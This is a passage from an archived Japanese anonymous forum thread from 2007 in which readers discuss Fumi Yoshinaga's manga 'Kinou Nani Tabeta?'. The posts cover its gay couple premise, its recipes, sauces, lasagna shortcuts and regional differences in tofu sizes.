もし男女の夫婦の話だったら、奥さんが料理を作る話になる?
専業主婦?それともシロさんみたいに仕事してて、急いで帰って
旦那の帰宅までに一通り作り終える話?うーん…なんつうか普通だ。
旦那が作る話だとそれこそ美味しんぼかクッパパだし。

134 :花と名無しさん:2007/11/28(水) 08:03:22 ID:???0
同居の同性同士の友人でもいいじゃないか

135 :花と名無しさん:2007/11/28(水) 09:18:10 ID:???0
巨乳で化粧したときだけ美人のFながと眼鏡アシスタントでいいじゃまいか
しつこく「これはフィクションです」って書いて

136 :花と名無しさん:2007/11/28(水) 12:02:55 ID:???0
つまりみんな次回作には百合を期待しているんだな

137 :花と名無しさん:2007/11/28(水) 15:47:18 ID:???0
クッキングホモ…うまいことをwww
ここでは簡単だと言われているきのう〜のレシピだが
どれも作るのが面倒臭く思える
鶏モモ肉に焼肉のタレをつけて焼くのは何とか出来そうだけど(;´Д`)
多分妙齢の女性なら世間一般的にはもっと出来なきゃ駄目てことなんだろう

138 :花と名無しさん:2007/11/28(水) 16:13:53 ID:???0
>>137
普段冷食や惣菜やレトルトに頼り気味だったり
炒め物中心の料理しかしませんって人には面倒なのかも。
普通に料理してるせいか、粗いなあって思うあのレシピ。

鶏肉のタレつけなんて簡単だからよく作るけど
焼肉のタレなんて不味くて不経済なもの使わないしなあ。

139 :花と名無しさん:2007/11/28(水) 16:59:04 ID:???0
>138
それは使ってるタレが不味いのがいけないんだと思うw
それかかーなーり薄味好きでよしなが味覚と反対側とか。

うちは「金本の兄貴タレ」使ってる、濃いけど美味しいよ。
ネギやニンニクを一緒につければ更にウマーーー

140 :花と名無しさん:2007/11/28(水) 17:32:25 ID:???0
>>139
そういう問題じゃないんだけど…と言っても多分分らないんだろうなあ。
まあそれで満足できる人にはぴったりのレシピって事で。

141 :花と名無しさん:2007/11/28(水) 17:33:34 ID:???0
兄貴のタレ…いかにもクッキングホモな調味料?

142 :花と名無しさん:2007/11/28(水) 18:09:53 ID:???0
はいはい140は料理上手な奥様で偉い偉い。

143 :花と名無しさん:2007/11/28(水) 18:36:32 ID:???0
モーニング本スレでは、クッキングパパのクッパパに倣って、
クッホモが正式通称となっております。


144 :花と名無しさん:2007/11/28(水) 18:42:01 ID:???0
兄貴のタレか…BL愛好者はこの商品も愛用すべきだなwww
そして作品内で主人公が使ってればネタとしては完璧だwwwwww

145 :花と名無しさん:2007/11/28(水) 19:26:10 ID:???0
炊き込みご飯と、鶏の焼き肉タレ漬けオーブン焼き作った。
一人暮らしだと、ついつい煮込み系、具だくさんスープ系の、ひと皿で
すんじゃう料理にしがちだから、新鮮だった。

ちなみにタレは、辛口にしてみた。ウマー(゚д゚)ウマー

男二人暮らしだと、食材あまらすことも、同じ料理連続になることも少な
いだろうから、そういう点では羨ましいよ。

146 :花と名無しさん:2007/11/28(水) 20:05:07 ID:???0
>>133
それこそクッキングホモならぬパパのところのように
だんなが作り、奥さん食べる人になるんしゃない?
料理好きなのにいちいち言い訳しながら料理する旦那がシロ

147 :花と名無しさん:2007/11/28(水) 23:00:40 ID:???0
つかケンジが上司(ノンケ)に激似で困る。
歳も近いし。

148 :花と名無しさん:2007/11/29(木) 00:04:37 ID:???0
クッキングホモだからこそ書ける感情のアヤを私は楽しく読んだけどな。

しろ母も、ジョーの事で悩む男も、「他人だから」のおばさんも、
この設定だから台詞が生きてるな、と。

料理は月並みなレシピなのかもしれないけど、声に出して読むとリズムがすごく良いよ。

149 :花と名無しさん:2007/11/29(木) 01:06:37 ID:???0
いや、普通は声に出して読まんだろw

150 :花と名無しさん:2007/11/29(木) 08:49:45 ID:???0
さりげない日常生活の中に、
それなりの悩みがあるってかんじがいいとは思う。

151 :花と名無しさん:2007/11/29(木) 10:19:30 ID:???0
だね。 クッホモはさりげないけど凄く良いお
ノンケの人なら夫や妻の話が素でできても
ゲイだと何で駄目なのかと泣いた話はぐっと来た

152 :花と名無しさん:2007/11/29(木) 13:36:26 ID:???0
くどいレシピはスルーしてるけど話としてはまったり読めて好きだよ
泣いた話は笑ったがw
ウザイけど正論をいう恋人と何となく誤魔化すドライ恋人の関係は人類共通ですという

153 :花と名無しさん:2007/11/29(木) 16:46:33 ID:???0
主婦と仲良くなる話がきもかった

154 :花と名無しさん:2007/11/29(木) 18:29:24 ID:???0
>>148
声に出して読んでみた

すごく・・・・はずかしいです・・・・

155 :花と名無しさん:2007/11/29(木) 19:18:55 ID:???0
>>148
すごく…おなかがへります…

156 :花と名無しさん:2007/11/29(木) 21:20:33 ID:???0
>140
通りすがりだが
お前感じ悪い

157 :花と名無しさん:2007/11/29(木) 21:20:34 ID:???0
>>148
てめぇはどこの栗原しんぺーだ!?
と思いました

158 :花と名無しさん:2007/11/29(木) 23:06:09 ID:???0
私、田舎育ちで、甘辛い味が全然だめだから
焼き肉のタレ漬け肉はぜんぜんうけつけない
>>140もきっと田舎者仲間なんだよ
察してくれよ!!

159 :花と名無しさん:2007/11/29(木) 23:20:52 ID:???0
了解ー。

160 :花と名無しさん:2007/11/29(木) 23:24:16 ID:???0
>>154
ヤマジュン漫画で想像しちゃったよ(ワラ

161 :花と名無しさん:2007/11/30(金) 02:11:57 ID:???0
ここで金本兄貴タレの名を見るとは思わなかったわ
あれは便利で良いタレだ。

そしてもしかしたら>139は電王好きな人?見当違いならごめん。

162 :花と名無しさん:2007/11/30(金) 02:20:16 ID:???0
>161
「かーなーり」に反応したなw

163 :花と名無しさん:2007/12/01(土) 11:15:18 ID:7eqoTEjWO
めんたいことサワークリームためした。
バゲットはくしくもあの店だ。
はっきしいっていまいち。
サワークリームをクリームチーズかアボカドにするとうまいかもと思います。

164 :花と名無しさん:2007/12/01(土) 11:41:45 ID:???0
ラザニヤ食べたい
でも手間のわりにおいしさは普通だよね

165 :花と名無しさん:2007/12/01(土) 13:34:58 ID:???0
ミートソーススパにホワイトソースぶっかけて
チーズのっけて焼いたらお手軽ラザニア風


166 :花と名無しさん:2007/12/01(土) 13:40:37 ID:???0
>>165
そんなお手軽レシピじゃリセットされないよぉ〜!
多少の手間隙かけたほうが、一つの案件を終えたくらいの
達成感を得られます。

167 :花と名無しさん:2007/12/01(土) 15:11:54 ID:???0
トマトの種を植えるとこからやれ

168 :花と名無しさん:2007/12/01(土) 15:56:52 ID:???0
>>167
  _、_
( ,_ノ` )y━・~~~  GJ 相変わらず上手い切り返しだ…

169 :花と名無しさん:2007/12/01(土) 23:17:41 ID:???0
時々モーニングで立ち読みしたときはつまらんと思ったけど
コミックス買って通して読んでみたら面白かった。
絵の白さが縮小で気にならなくなるのも大きいかも。

170 :花と名無しさん:2007/12/02(日) 20:12:29 ID:???0
朝日新聞の読書欄?にとりあげられていたね

171 :花と名無しさん:2007/12/02(日) 21:18:20 ID:6hlT/M2b0
アンティークのドラマが好きだったという男に
原作渡したら引かれた
そりゃそうか…

172 :花と名無しさん:2007/12/02(日) 21:25:01 ID:???0
>>171
原作の方が面白いのにね

173 :花と名無しさん:2007/12/02(日) 21:29:10 ID:???0
>>170
そういう見方もあるか、とおもしろく読んだが
「ゲイ」の一言もないのはいかがかと思った

174 :花と名無しさん:2007/12/02(日) 22:43:58 ID:sb69gWYD0
家が近所なのです。
「きのう何食べた?」も南阿佐ヶ谷のお話ですよね。
今日はついパールセンターでスイカを買ってしまった。
あのスーパーではないですが。

175 :花と名無しさん:2007/12/02(日) 22:48:05 ID:???0
>>174
ナカノwの豆腐3丁良く買う

176 :花と名無しさん:2007/12/02(日) 23:19:29 ID:???0
あの豆腐3丁って、1丁はどのくらいのサイズ?
豆腐の大きさの基準って地方で差があるから・・・。
二人暮らしで3丁ってどれだけ豆腐食ってんだ・・・? と頭が疑問符だらけになったけど
東京の豆腐は小さいのかな、と

177 :花と名無しさん:2007/12/02(日) 23:49:15 ID:???0
>>176
昔東京から盛岡に越していって
母親に油揚げを2枚買ってこいと言われ
素直に2枚買って帰ったら怒られた
盛岡の油揚げは東京の3倍はあったw

豆腐3丁の奴は充填式の日持ちする奴っぽい
あれは安売りで買っておくと便利っちゃ便利
味は落ちるけどね

42 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)